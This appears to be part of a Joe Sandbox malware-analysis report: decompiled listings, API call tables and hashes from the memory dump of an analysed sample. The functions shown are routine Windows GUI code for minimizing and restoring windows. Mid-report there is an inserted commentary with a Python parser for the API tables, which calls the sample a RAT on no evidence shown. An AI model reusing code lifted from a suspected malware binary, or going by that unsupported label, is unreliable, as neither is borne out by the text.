                                                    								_t287 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                                    								__eflags = _t287;
                                                    								if(_t287 < 0) {
                                                    									goto L67;
                                                    								} else {
                                                    									_t288 = _t287 + 1;
                                                    									_t373 = 0;
                                                    									__eflags = 0;
                                                    									while(1) {
                                                    										_v16 = L0044DD30(E0041AC6C(_v8, _t373), 0,  *((intOrPtr*)(_v44 + 8)));
                                                    										__eflags = _v16;
                                                    										if(_v16 != 0) {
                                                    											break;
                                                    										}
                                                    										_t373 = _t373 + 1;
                                                    										_t288 = _t288 - 1;
                                                    										__eflags = _t288;
                                                    										if(_t288 != 0) {
                                                    											continue;
                                                    										} else {
                                                    											goto L67;
                                                    										}
                                                    										goto L69;
                                                    									}
                                                    									_v32 = GetWindowDC( *(_v8 + 0x10));
                                                    									 *[fs:eax] = _t380;
                                                    									_v24 = E0042572C(0, 1);
                                                    									 *[fs:eax] = _t380;
                                                    									_v28 = SaveDC(_v32);
                                                    									 *[fs:eax] = _t380;
                                                    									L00425CE8(_v24, _v32);
                                                    									L00425B88(_v24);
                                                    									 *((intOrPtr*)( *_v16 + 0x38))(_v44 + 0x10,  *[fs:eax], 0x44eea7, _t378,  *[fs:eax], 0x44eec4, _t378,  *[fs:eax], 0x44eee9, _t378);
                                                    									_pop(_t343);
                                                    									 *[fs:eax] = _t343;
                                                    									_push(0x44eeae);
                                                    									__eflags = 0;
                                                    									L00425CE8(_v24, 0);
                                                    									return RestoreDC(_v32, _v28);
                                                    								}
                                                    							} else {
                                                    								if(_t214 == 0x27) {
                                                    									_v36 =  *((intOrPtr*)(__edx + 8));
                                                    									_t291 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                                    									__eflags = _t291;
                                                    									if(_t291 < 0) {
                                                    										goto L67;
                                                    									} else {
                                                    										_t292 = _t291 + 1;
                                                    										_t374 = 0;
                                                    										__eflags = 0;
                                                    										while(1) {
                                                    											_t252 =  *((intOrPtr*)( *((intOrPtr*)(E0041AC6C(_v8, _t374))) + 0x34))();
                                                    											_t347 = _v36;
                                                    											__eflags = _t252 -  *((intOrPtr*)(_t347 + 0xc));
                                                    											if(_t252 !=  *((intOrPtr*)(_t347 + 0xc))) {
                                                    												_v16 = L0044DD30(E0041AC6C(_v8, _t374), 1,  *((intOrPtr*)(_v36 + 0xc)));
                                                    											} else {
                                                    												_v16 =  *((intOrPtr*)(E0041AC6C(_v8, _t374) + 0x34));
                                                    											}
                                                    											__eflags = _v16;
                                                    											if(_v16 != 0) {
                                                    												break;
                                                    											}
                                                    											_t374 = _t374 + 1;
                                                    											_t292 = _t292 - 1;
                                                    											__eflags = _t292;
                                                    											if(_t292 != 0) {
                                                    												continue;
                                                    											} else {
                                                    												goto L67;
                                                    											}
                                                    											goto L68;
                                                    										}
                                                    										_t258 = L0044DD60(E0041AC6C(_v8, _t374), 1,  *((intOrPtr*)(_v36 + 8)));
                                                    										__eflags = _t258;
                                                    										if(_t258 == 0) {
                                                    											_t266 = E0041AC6C(_v8, _t374);
                                                    											__eflags = 0;
                                                    											_t258 = L0044DD60(_t266, 0,  *((intOrPtr*)(_v36 + 0xc)));
                                                    										}
                                                    										_t354 =  *0x49de0c; // 0x49ebbc
                                                    										_t356 =  *( *_t354 + 0x6c);
                                                    										__eflags = _t356;
                                                    										if(_t356 != 0) {
                                                    											__eflags = _t258;
                                                    											if(_t258 == 0) {
                                                    												_t258 =  *(_t356 + 0x158);
                                                    											}
                                                    											_t308 =  *0x49de0c; // 0x49ebbc
                                                    											__eflags =  *(_t356 + 0x228) & 0x00000008;
                                                    											if(( *(_t356 + 0x228) & 0x00000008) == 0) {
                                                    												_t357 =  *0x49dbcc; // 0x49ebb8
                                                    												E0045ACB4( *_t357, _t292, _t308, _t258, _t374, _t376);
                                                    											} else {
                                                    												E0045AD1C();
                                                    											}
                                                    										}
                                                    									}
                                                    								} else {
                                                    									L67:
                                                    									_push( *(_t376 + 8));
                                                    									_push( *(_t376 + 4));
                                                    									_push( *_t376);
                                                    									_t144 =  *(_v8 + 0x10);
                                                    									_push(_t144);
                                                    									L00407540();
                                                    									 *(_t376 + 0xc) = _t144;
                                                    								}
                                                    								L68:
                                                    								_pop(_t312);
                                                    								 *[fs:eax] = _t312;
                                                    								_push(0x44ef7a);
                                                    								return E004049C0( &_v52);
                                                    							}
                                                    						}
                                                    					}
                                                    				}
                                                    				L69:
                                                    			}

                                                    0x0044ea41
                                                    0x0044ea43
                                                    0x0044ea4b
                                                    0x0044ea4e
                                                    0x0044ea50
                                                    0x0044ea55
                                                    0x0044ea56
                                                    0x0044ea5b
                                                    0x0044ea5e
                                                    0x0044ea61
                                                    0x0044ea63
                                                    0x0044ea68
                                                    0x0044ea8a
                                                    0x0044ea8a
                                                    0x0044ea8f
                                                    0x0044eade
                                                    0x0044eadf
                                                    0x0044eae1
                                                    0x00000000
                                                    0x0044eae7
                                                    0x0044eae7
                                                    0x0044eae8
                                                    0x0044eae8
                                                    0x0044eaea
                                                    0x0044eaf7
                                                    0x0044eafc
                                                    0x0044eafe
                                                    0x00000000
                                                    0x00000000
                                                    0x0044eb04
                                                    0x0044eb05
                                                    0x0044eb05
                                                    0x0044eb06
                                                    0x00000000
                                                    0x0044eb08
                                                    0x00000000
                                                    0x0044eb08
                                                    0x00000000
                                                    0x0044eb06
                                                    0x0044eaea
                                                    0x0044ea91
                                                    0x0044ea91
                                                    0x0044ea91
                                                    0x0044ea94
                                                    0x0044eb0d
                                                    0x0044eb11
                                                    0x0044eb15
                                                    0x0044eb17
                                                    0x0044eb17
                                                    0x0044eb21
                                                    0x0044eb22
                                                    0x0044eb24
                                                    0x0044eb9a
                                                    0x0044eb9a
                                                    0x0044eba3
                                                    0x00000000
                                                    0x0044eb26
                                                    0x0044eb26
                                                    0x0044eb27
                                                    0x0044eb27
                                                    0x0044eb29
                                                    0x0044eb29
                                                    0x0044eb2d
                                                    0x0044eb53
                                                    0x0044eb2f
                                                    0x0044eb2f
                                                    0x0044eb32
                                                    0x0044eb34
                                                    0x0044eb46
                                                    0x0044eb36
                                                    0x0044eb41
                                                    0x0044eb41
                                                    0x0044eb34
                                                    0x0044eb5b
                                                    0x0044eb60
                                                    0x0044eb6b
                                                    0x0044eb6e
                                                    0x0044eb72
                                                    0x00000000
                                                    0x00000000
                                                    0x0044eb96
                                                    0x0044eb97
                                                    0x0044eb97
                                                    0x0044eb98
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0044eb98
                                                    0x0044eb7d
                                                    0x0044eb85
                                                    0x0044eb8c
                                                    0x0044eb8c
                                                    0x0044ea96
                                                    0x0044ea96
                                                    0x0044ea97
                                                    0x0044ef00
                                                    0x0044ef01
                                                    0x0044ef03
                                                    0x00000000
                                                    0x0044ef05
                                                    0x0044ef05
                                                    0x0044ef06
                                                    0x0044ef06
                                                    0x0044ef08
                                                    0x0044ef12
                                                    0x0044ef1a
                                                    0x0044ef1d
                                                    0x0044ef20
                                                    0x00000000
                                                    0x00000000
                                                    0x0044ef2a
                                                    0x0044ef2f
                                                    0x0044ef31
                                                    0x0044ef3f
                                                    0x0044ef40
                                                    0x0044ef40
                                                    0x0044ef41
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0044ef31
                                                    0x0044ef38
                                                    0x0044ef38
                                                    0x0044ea9d
                                                    0x00000000
                                                    0x0044ea9d
                                                    0x0044ea97
                                                    0x0044ea94
                                                    0x00000000
                                                    0x0044ea6a
                                                    0x0044ea6a
                                                    0x0044eaa8
                                                    0x0044eaa9
                                                    0x0044eaab
                                                    0x00000000
                                                    0x0044eab1
                                                    0x0044eab1
                                                    0x0044eab2
                                                    0x0044eab2
                                                    0x0044eab4
                                                    0x0044eab9
                                                    0x0044eac2
                                                    0x0044eac7
                                                    0x0044eac9
                                                    0x00000000
                                                    0x00000000
                                                    0x0044eacf
                                                    0x0044ead0
                                                    0x0044ead0
                                                    0x0044ead1
                                                    0x00000000
                                                    0x0044ead3
                                                    0x00000000
                                                    0x0044ead3
                                                    0x00000000
                                                    0x0044ead1
                                                    0x0044eab4
                                                    0x00000000
                                                    0x0044ea6c
                                                    0x0044ea6c
                                                    0x0044ea6f
                                                    0x0044ecb2
                                                    0x0044ecbb
                                                    0x0044ecbc
                                                    0x0044ecbe
                                                    0x00000000
                                                    0x0044ecc4
                                                    0x0044ecc4
                                                    0x0044ecc5
                                                    0x0044ecc5
                                                    0x0044ecc7
                                                    0x0044ecde
                                                    0x0044ece1
                                                    0x0044ece5
                                                    0x00000000
                                                    0x00000000
                                                    0x0044edad
                                                    0x0044edae
                                                    0x0044edae
                                                    0x0044edaf
                                                    0x00000000
                                                    0x0044edb5
                                                    0x00000000
                                                    0x0044edb5
                                                    0x00000000
                                                    0x0044edaf
                                                    0x0044ecf7
                                                    0x0044ecfc
                                                    0x0044ecfd
                                                    0x0044ed02
                                                    0x0044ed05
                                                    0x0044ed14
                                                    0x0044ed19
                                                    0x0044ed1a
                                                    0x0044ed1f
                                                    0x0044ed22
                                                    0x0044ed2e
                                                    0x0044ed43
                                                    0x0044ed5c
                                                    0x0044ed63
                                                    0x0044ed66
                                                    0x0044ed69
                                                    0x0044ed6e
                                                    0x0044ed73
                                                    0x0044ed88
                                                    0x0044ed88
                                                    0x0044ea75
                                                    0x0044ea75
                                                    0x0044ea76
                                                    0x0044edbd
                                                    0x0044edc6
                                                    0x0044edc7
                                                    0x0044edc9
                                                    0x00000000
                                                    0x0044edcf
                                                    0x0044edcf
                                                    0x0044edd0
                                                    0x0044edd0
                                                    0x0044edd2
                                                    0x0044ede9
                                                    0x0044edec
                                                    0x0044edf0
                                                    0x00000000
                                                    0x00000000
                                                    0x0044eef0
                                                    0x0044eef1
                                                    0x0044eef1
                                                    0x0044eef2
                                                    0x00000000
                                                    0x0044eef8
                                                    0x00000000
                                                    0x0044eef8
                                                    0x00000000
                                                    0x0044eef2
                                                    0x0044ee02
                                                    0x0044ee10
                                                    0x0044ee1f
                                                    0x0044ee2d
                                                    0x0044ee39
                                                    0x0044ee47
                                                    0x0044ee50
                                                    0x0044ee65
                                                    0x0044ee7f
                                                    0x0044ee84
                                                    0x0044ee87
                                                    0x0044ee8a
                                                    0x0044ee8f
                                                    0x0044ee94
                                                    0x0044eea6
                                                    0x0044eea6
                                                    0x0044ea7c
                                                    0x0044ea7f
                                                    0x0044ebb0
                                                    0x0044ebb9
                                                    0x0044ebba
                                                    0x0044ebbc
                                                    0x00000000
                                                    0x0044ebc2
                                                    0x0044ebc2
                                                    0x0044ebc3
                                                    0x0044ebc3
                                                    0x0044ebc5
                                                    0x0044ebd1
                                                    0x0044ebd4
                                                    0x0044ebd7
                                                    0x0044ebda
                                                    0x0044ec05
                                                    0x0044ebdc
                                                    0x0044ebe9
                                                    0x0044ebe9
                                                    0x0044ec08
                                                    0x0044ec0c
                                                    0x00000000
                                                    0x00000000
                                                    0x0044eca2
                                                    0x0044eca3
                                                    0x0044eca3
                                                    0x0044eca4
                                                    0x00000000
                                                    0x0044ecaa
                                                    0x00000000
                                                    0x0044ecaa
                                                    0x00000000
                                                    0x0044eca4
                                                    0x0044ec24
                                                    0x0044ec29
                                                    0x0044ec2b
                                                    0x0044ec32
                                                    0x0044ec3d
                                                    0x0044ec3f
                                                    0x0044ec3f
                                                    0x0044ec44
                                                    0x0044ec4c
                                                    0x0044ec4f
                                                    0x0044ec51
                                                    0x0044ec57
                                                    0x0044ec59
                                                    0x0044ec60
                                                    0x0044ec60
                                                    0x0044ec66
                                                    0x0044ec6c
                                                    0x0044ec73
                                                    0x0044ec8f
                                                    0x0044ec98
                                                    0x0044ec75
                                                    0x0044ec85
                                                    0x0044ec85
                                                    0x0044ec73
                                                    0x0044ec51
                                                    0x0044ea85
                                                    0x0044ef43
                                                    0x0044ef46
                                                    0x0044ef4a
                                                    0x0044ef4d
                                                    0x0044ef51
                                                    0x0044ef54
                                                    0x0044ef55
                                                    0x0044ef5a
                                                    0x0044ef5a
                                                    0x0044ef5d
                                                    0x0044ef5f
                                                    0x0044ef62
                                                    0x0044ef65
                                                    0x0044ef72
                                                    0x0044ef72
                                                    0x0044ea76
                                                    0x0044ea6f
                                                    0x0044ea6a
                                                    0x00000000

                                                    APIs
                                                    • SaveDC.GDI32(?), ref: 0044ED0F
                                                    • RestoreDC.GDI32(?,?), ref: 0044ED83
                                                    • GetWindowDC.USER32(?,00000000,0044EF73), ref: 0044EDFD
                                                    • SaveDC.GDI32(?), ref: 0044EE34
                                                    • RestoreDC.GDI32(?,?), ref: 0044EEA1
                                                    • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,0044EF73), ref: 0044EF55
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: RestoreSaveWindow$NtdllProc_
                                                    • String ID: LbC
                                                    • API String ID: 1346906915-1054848185
                                                    • Opcode ID: 9271bb3190d8798086136275e03b0e8807570e2f302814090e834d2e64d099f3
                                                    • Instruction ID: 9827756e5d0f78ec9e29d95b15367e488dbc04d0ac3e4e0047c09454960c1bc5
                                                    • Opcode Fuzzy Hash: 9271bb3190d8798086136275e03b0e8807570e2f302814090e834d2e64d099f3
                                                    • Instruction Fuzzy Hash: 5AE19D34A04605DFEB10DF6AC8819AEF3F5FF58304B2485AAE805A7361D738ED41CB99
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 37%
                                                    			E0045A104(void* __eax) {
                                                    				struct HWND__* _t21;
                                                    				intOrPtr* _t26;
                                                    				signed int _t29;
                                                    				intOrPtr* _t30;
                                                    				int _t33;
                                                    				intOrPtr _t36;
                                                    				void* _t51;
                                                    				int _t60;
                                                    
                                                    				_t51 = __eax;
                                                    				_t21 = IsIconic( *(__eax + 0x30));
                                                    				if(_t21 != 0) {
                                                    					SetActiveWindow( *(_t51 + 0x30));
                                                    					if( *((intOrPtr*)(_t51 + 0x44)) == 0 ||  *((char*)(_t51 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t51 + 0x44)) + 0x57)) == 0) {
                                                    						L6:
                                                    						E0045906C( *(_t51 + 0x30), 9, __eflags);
                                                    					} else {
                                                    						_t60 = IsWindowEnabled(E00441704( *((intOrPtr*)(_t51 + 0x44))));
                                                    						if(_t60 == 0) {
                                                    							goto L6;
                                                    						} else {
                                                    							_push(0);
                                                    							_push(0xf120);
                                                    							_push(0x112);
                                                    							_push( *(_t51 + 0x30));
                                                    							L00407540();
                                                    						}
                                                    					}
                                                    					_t26 =  *0x49d970; // 0x49e900
                                                    					_t29 =  *((intOrPtr*)( *_t26))(1, 0, 0, 0x40) >> 1;
                                                    					if(_t60 < 0) {
                                                    						asm("adc eax, 0x0");
                                                    					}
                                                    					_t30 =  *0x49d970; // 0x49e900
                                                    					_t33 =  *((intOrPtr*)( *_t30))(0, _t29) >> 1;
                                                    					if(_t60 < 0) {
                                                    						asm("adc eax, 0x0");
                                                    					}
                                                    					SetWindowPos( *(_t51 + 0x30), 0, _t33, ??, ??, ??, ??);
                                                    					_t36 =  *((intOrPtr*)(_t51 + 0x44));
                                                    					if(_t36 != 0 &&  *((char*)(_t36 + 0x22b)) == 1 &&  *((char*)(_t36 + 0x57)) == 0) {
                                                    						E00454D78(_t36, 0);
                                                    						E00457194( *((intOrPtr*)(_t51 + 0x44)));
                                                    					}
                                                    					E0045974C(_t51);
                                                    					_t21 =  *0x49ebbc; // 0x0
                                                    					_t55 =  *((intOrPtr*)(_t21 + 0x64));
                                                    					if( *((intOrPtr*)(_t21 + 0x64)) != 0) {
                                                    						_t21 = SetFocus(E00441704(_t55));
                                                    					}
                                                    					if( *((short*)(_t51 + 0x122)) != 0) {
                                                    						return  *((intOrPtr*)(_t51 + 0x120))();
                                                    					}
                                                    				}
                                                    				return _t21;
                                                    			}

                                                    0x0045a106
                                                    0x0045a10c
                                                    0x0045a113
                                                    0x0045a11d
                                                    0x0045a126
                                                    0x0045a160
                                                    0x0045a168
                                                    0x0045a137
                                                    0x0045a145
                                                    0x0045a147
                                                    0x00000000
                                                    0x0045a149
                                                    0x0045a149
                                                    0x0045a14b
                                                    0x0045a150
                                                    0x0045a158
                                                    0x0045a159
                                                    0x0045a159
                                                    0x0045a147
                                                    0x0045a175
                                                    0x0045a17e
                                                    0x0045a180
                                                    0x0045a182
                                                    0x0045a182
                                                    0x0045a188
                                                    0x0045a191
                                                    0x0045a193
                                                    0x0045a195
                                                    0x0045a195
                                                    0x0045a19f
                                                    0x0045a1a4
                                                    0x0045a1a9
                                                    0x0045a1bc
                                                    0x0045a1c4
                                                    0x0045a1c4
                                                    0x0045a1cb
                                                    0x0045a1d0
                                                    0x0045a1d5
                                                    0x0045a1da
                                                    0x0045a1e4
                                                    0x0045a1e4
                                                    0x0045a1f1
                                                    0x00000000
                                                    0x0045a1fb
                                                    0x0045a1f1
                                                    0x0045a203

                                                    APIs
                                                    • IsIconic.USER32 ref: 0045A10C
                                                    • SetActiveWindow.USER32(?,?,?,?,00459B2D,00000000,00459FEE), ref: 0045A11D
                                                    • IsWindowEnabled.USER32(00000000), ref: 0045A140
                                                    • NtdllDefWindowProc_A.USER32(?,00000112,0000F120,00000000,00000000,?,?,?,?,00459B2D,00000000,00459FEE), ref: 0045A159
                                                    • SetWindowPos.USER32(?,00000000,00000000,?,?,00459B2D,00000000,00459FEE), ref: 0045A19F
                                                    • SetFocus.USER32(00000000,?,00000000,00000000,?,?,00459B2D,00000000,00459FEE), ref: 0045A1E4
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Window$ActiveEnabledFocusIconicNtdllProc_
                                                    • String ID:
                                                    • API String ID: 3996302123-0
                                                    • Opcode ID: a04679a4ac2906456c8448a2d84214dddb4dc2f3039b57f19c98973d0d101b18
                                                    • Instruction ID: e53a9b633d1b0bd006f11759a665d113d80ac3550e73a578dd09315b07be2b8d
                                                    • Opcode Fuzzy Hash: a04679a4ac2906456c8448a2d84214dddb4dc2f3039b57f19c98973d0d101b18
                                                    • Instruction Fuzzy Hash: B831DD71B006009BEB11EB69CD86B563798AB04709F0805AAFE04DF2D7D67DEC58C75A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%
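The "APIs" lists above are the quickest way to triage a listing like this one without reading the decompilation: the argument columns carry the raw Win32 constants, and for E0045A104 the call recorded at 0045A159 passes 0x112 (WM_SYSCOMMAND) with 0xF120 (SC_RESTORE), while the matching routine E0045A054 further down pushes 0x112 with 0xF020 (SC_MINIMIZE). The following parser is an added example and is not part of the Joe Sandbox report or of the analysed sample; it assumes the line shape shown on this page (a bullet, `Name.MODULE`, an optional argument list of hex values or `?`, then `ref: ADDR`), and the WM_SYSCOMMAND/SC_* values are the documented winuser.h constants. The sample input is the six lines listed for E0045A104.

```python
"""Parse the per-function "APIs" lines of a Joe Sandbox decompilation listing
and decode the WM_SYSCOMMAND / SC_* arguments they carry."""
import re

# Constructed input: the six API lines this page lists for E0045A104.
SAMPLE_APIS = """\
• IsIconic.USER32 ref: 0045A10C
• SetActiveWindow.USER32(?,?,?,?,00459B2D,00000000,00459FEE), ref: 0045A11D
• IsWindowEnabled.USER32(00000000), ref: 0045A140
• NtdllDefWindowProc_A.USER32(?,00000112,0000F120,00000000,00000000,?,?,?,?,00459B2D,00000000,00459FEE), ref: 0045A159
• SetWindowPos.USER32(?,00000000,00000000,?,?,00459B2D,00000000,00459FEE), ref: 0045A19F
• SetFocus.USER32(00000000,?,00000000,00000000,?,?,00459B2D,00000000,00459FEE), ref: 0045A1E4
"""

# Documented Win32 constants (winuser.h); the report shows them only as raw hex.
WM_SYSCOMMAND = 0x0112
SC_COMMANDS = {
    0xF020: "SC_MINIMIZE",
    0xF030: "SC_MAXIMIZE",
    0xF060: "SC_CLOSE",
    0xF120: "SC_RESTORE",
}

# Assumed line format: "• Name.MODULE(arg,arg,...), ref: ADDR" or "• Name.MODULE ref: ADDR".
API_LINE = re.compile(
    r"^\s*•\s*(?P<name>\w+)\.(?P<module>\w+)"  # e.g. SetWindowPos.USER32
    r"(?:\((?P<args>[^)]*)\))?"                  # optional argument list
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"     # call-site address
)


def _parse_arg(token):
    """'?' means the decompiler could not resolve the value; keep it as None."""
    token = token.strip()
    return None if token == "?" else int(token, 16)


def parse_apis(text):
    """Return one dict per API line: name, module, argument list and call site."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue  # section headers and other non-API residue
        raw = m.group("args")
        args = [] if raw is None else [_parse_arg(a) for a in raw.split(",")]
        calls.append({
            "name": m.group("name"),
            "module": m.group("module"),
            "args": args,
            "ref": int(m.group("ref"), 16),
        })
    return calls


def sys_commands(calls):
    """(call site, SC_* name) for every call whose arguments carry WM_SYSCOMMAND
    immediately followed by a known system-command code (message, wParam order)."""
    found = []
    for call in calls:
        args = call["args"]
        for i in range(len(args) - 1):
            if args[i] == WM_SYSCOMMAND and args[i + 1] in SC_COMMANDS:
                found.append((call["ref"], SC_COMMANDS[args[i + 1]]))
    return found


def api_profile(calls):
    """Module -> sorted, de-duplicated API names: a compact per-function summary
    that can be compared across the thousands of functions in a report."""
    by_module = {}
    for call in calls:
        by_module.setdefault(call["module"], set()).add(call["name"])
    return {module: sorted(names) for module, names in by_module.items()}


if __name__ == "__main__":
    parsed = parse_apis(SAMPLE_APIS)
    print(api_profile(parsed))
    for ref, cmd in sys_commands(parsed):
        print(f"{ref:08X}: WM_SYSCOMMAND {cmd}")
```

Run over the E0045A104 list this prints a single USER32 profile and decodes the call at 0045A159 as WM_SYSCOMMAND SC_RESTORE; fed the corresponding line for E0045A054 it yields SC_MINIMIZE. Together with IsIconic, SetActiveWindow, SetWindowPos and SetFocus, that profile marks these routines as ordinary form minimize/restore helpers of the GUI runtime rather than RAT-specific logic, so an analyst can deprioritise them and spend time on functions whose API sets touch process, network or persistence APIs.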

                                                    C-Code - Quality: 85%
                                                    			E004410F0(void* __eax, int __ecx, int __edx, int _a4, int _a8) {
                                                    				void* _v20;
                                                    				struct _WINDOWPLACEMENT _v48;
                                                    				char _v64;
                                                    				void* _t31;
                                                    				int _t45;
                                                    				int _t51;
                                                    				void* _t52;
                                                    				int _t56;
                                                    				int _t58;
                                                    
                                                    				_t56 = __ecx;
                                                    				_t58 = __edx;
                                                    				_t52 = __eax;
                                                    				if(__edx !=  *((intOrPtr*)(__eax + 0x40)) || __ecx !=  *((intOrPtr*)(__eax + 0x44)) || _a8 !=  *((intOrPtr*)(__eax + 0x48))) {
                                                    					L4:
                                                    					if(L00441A08(_t52) == 0) {
                                                    						L7:
                                                    						 *(_t52 + 0x40) = _t58;
                                                    						 *(_t52 + 0x44) = _t56;
                                                    						 *((intOrPtr*)(_t52 + 0x48)) = _a8;
                                                    						 *((intOrPtr*)(_t52 + 0x4c)) = _a4;
                                                    						_t31 = L00441A08(_t52);
                                                    						__eflags = _t31;
                                                    						if(_t31 != 0) {
                                                    							_v48.length = 0x2c;
                                                    							GetWindowPlacement( *(_t52 + 0x180),  &_v48);
                                                    							E0043A91C(_t52,  &_v64);
                                                    							asm("movsd");
                                                    							asm("movsd");
                                                    							asm("movsd");
                                                    							asm("movsd");
                                                    							SetWindowPlacement( *(_t52 + 0x180),  &_v48);
                                                    						}
                                                    						L9:
                                                    						E0043A5D0(_t52);
                                                    						return L00403DE8(_t52, _t66);
                                                    					}
                                                    					_t45 = IsIconic( *(_t52 + 0x180));
                                                    					_t66 = _t45;
                                                    					if(_t45 != 0) {
                                                    						goto L7;
                                                    					}
                                                    					SetWindowPos( *(_t52 + 0x180), 0, _t58, _t56, _a8, _a4, 0x14);
                                                    					goto L9;
                                                    				} else {
                                                    					_t51 = _a4;
                                                    					if(_t51 ==  *((intOrPtr*)(__eax + 0x4c))) {
                                                    						return _t51;
                                                    					}
                                                    					goto L4;
                                                    				}
                                                    			}

                                                    0x004410f9
                                                    0x004410fb
                                                    0x004410fd
                                                    0x00441102
                                                    0x0044111d
                                                    0x00441126
                                                    0x00441154
                                                    0x00441154
                                                    0x00441157
                                                    0x0044115d
                                                    0x00441163
                                                    0x00441168
                                                    0x0044116d
                                                    0x0044116f
                                                    0x00441171
                                                    0x00441183
                                                    0x0044118d
                                                    0x00441198
                                                    0x00441199
                                                    0x0044119a
                                                    0x0044119b
                                                    0x004411a7
                                                    0x004411a7
                                                    0x004411ac
                                                    0x004411ae
                                                    0x00000000
                                                    0x004411b9
                                                    0x0044112f
                                                    0x00441134
                                                    0x00441136
                                                    0x00000000
                                                    0x00000000
                                                    0x0044114d
                                                    0x00000000
                                                    0x00441111
                                                    0x00441111
                                                    0x00441117
                                                    0x004411c4
                                                    0x004411c4
                                                    0x00000000
                                                    0x00441117

                                                    APIs
                                                    • IsIconic.USER32 ref: 0044112F
                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 0044114D
                                                    • GetWindowPlacement.USER32(?,0000002C), ref: 00441183
                                                    • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 004411A7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Window$Placement$Iconic
                                                    • String ID: ,
                                                    • API String ID: 568898626-3772416878
                                                    • Opcode ID: cbc295ee499962ac83a9ff01bfd7ce2be257ba844d1b33c8d8d56419791f1386
                                                    • Instruction ID: 973ca0ced29493b3e0d87defc8b2cb9363f4da81e4e6ee6b5ea2909c58c8dcf6
                                                    • Opcode Fuzzy Hash: cbc295ee499962ac83a9ff01bfd7ce2be257ba844d1b33c8d8d56419791f1386
                                                    • Instruction Fuzzy Hash: AA21B271A00108ABDF10EF69C8C19DA77A8AF4D354F00406AFE14EF352D779ED448B65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 79%
                                                    			E0045A054(void* __eax) {
                                                    				int _t21;
                                                    				struct HWND__* _t36;
                                                    				void* _t40;
                                                    
                                                    				_t40 = __eax;
                                                    				_t1 = _t40 + 0x30; // 0x0
                                                    				_t21 = IsIconic( *_t1);
                                                    				if(_t21 == 0) {
                                                    					E0045973C();
                                                    					_t2 = _t40 + 0x30; // 0x0
                                                    					SetActiveWindow( *_t2);
                                                    					if( *((intOrPtr*)(_t40 + 0x44)) == 0 ||  *((char*)(_t40 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t40 + 0x44)) + 0x57)) == 0 || IsWindowEnabled(E00441704( *((intOrPtr*)(_t40 + 0x44)))) == 0) {
                                                    						_t15 = _t40 + 0x30; // 0x0
                                                    						_t21 = E0045906C( *_t15, 6, __eflags);
                                                    					} else {
                                                    						_t43 =  *((intOrPtr*)(_t40 + 0x44));
                                                    						_t36 = E00441704( *((intOrPtr*)(_t40 + 0x44)));
                                                    						_t13 = _t40 + 0x30; // 0x0
                                                    						SetWindowPos( *_t13, _t36,  *( *((intOrPtr*)(_t40 + 0x44)) + 0x40),  *( *((intOrPtr*)(_t40 + 0x44)) + 0x44),  *(_t43 + 0x48), 0, 0x40);
                                                    						_push(0);
                                                    						_push(0xf020);
                                                    						_push(0x112);
                                                    						_t14 = _t40 + 0x30; // 0x0
                                                    						_t21 =  *_t14;
                                                    						_push(_t21);
                                                    						L00407540();
                                                    					}
                                                    					if( *((short*)(_t40 + 0x11a)) != 0) {
                                                    						return  *((intOrPtr*)(_t40 + 0x118))();
                                                    					}
                                                    				}
                                                    				return _t21;
                                                    			}
                                                    0x0045a056
                                                    0x0045a058
                                                    0x0045a05c
                                                    0x0045a063
                                                    0x0045a06b
                                                    0x0045a070
                                                    0x0045a074
                                                    0x0045a07d
                                                    0x0045a0e1
                                                    0x0045a0e4
                                                    0x0045a0a0
                                                    0x0045a0a4
                                                    0x0045a0b6
                                                    0x0045a0bc
                                                    0x0045a0c0
                                                    0x0045a0c5
                                                    0x0045a0c7
                                                    0x0045a0cc
                                                    0x0045a0d1
                                                    0x0045a0d1
                                                    0x0045a0d4
                                                    0x0045a0d5
                                                    0x0045a0d5
                                                    0x0045a0f1
                                                    0x00000000
                                                    0x0045a0fb
                                                    0x0045a0f1
                                                    0x0045a103

                                                    APIs
                                                    • IsIconic.USER32 ref: 0045A05C
                                                    • SetActiveWindow.USER32(00000000,00000000,?,?,0045A790), ref: 0045A074
                                                    • IsWindowEnabled.USER32(00000000), ref: 0045A097
                                                    • SetWindowPos.USER32(00000000,00000000,?,?,?,00000000,00000040,00000000,00000000,00000000,?,?,0045A790), ref: 0045A0C0
                                                    • NtdllDefWindowProc_A.USER32(00000000,00000112,0000F020,00000000,00000000,00000000,?,?,?,00000000,00000040,00000000,00000000,00000000), ref: 0045A0D5
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
